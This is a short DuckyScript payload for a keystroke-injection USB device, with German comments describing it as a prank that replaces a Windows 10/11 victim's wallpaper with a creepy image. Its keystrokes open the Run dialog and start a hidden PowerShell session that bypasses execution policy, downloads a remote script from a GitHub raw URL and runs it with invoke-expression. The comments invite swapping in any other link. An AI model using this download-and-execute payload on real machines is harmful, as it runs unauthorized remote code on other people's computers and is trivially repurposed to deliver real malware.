REM     Titel: Ersetze Hintergrund
REM     Autor: WIHRUS
REM     Beschreibung: der Payload ersetzt das Hintergrundbild gegen ein gruseliges Bild
REM     Ziel Betriebssystem: Windows 10, 11
REM     Ersetze den Link gegen eine eigene Datei oder gegen einen eigenen Link um eine angepasste Version zu verwenden.
REM     Achte darauf ?dl=0 mit ?dl=1 am ende des Links zu ersetzen um das Skript direkt auszufuehren
REM     --------------------------------------------------------------------------------------
REM     DIESER PAYLOAD IST PLUG AND PLAY, ES SIND KEINE ANPASSUNGEN NOTWENDIG
REM     --------------------------------------------------------------------------------------
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://raw.githubusercontent.com/wihrus/Prank_Scripts/main/Creepy%20Wallpaper/change-Wallpaper-Creepy.ps1?dl=1; invoke-expression $pl
DELAY 500
ENTER
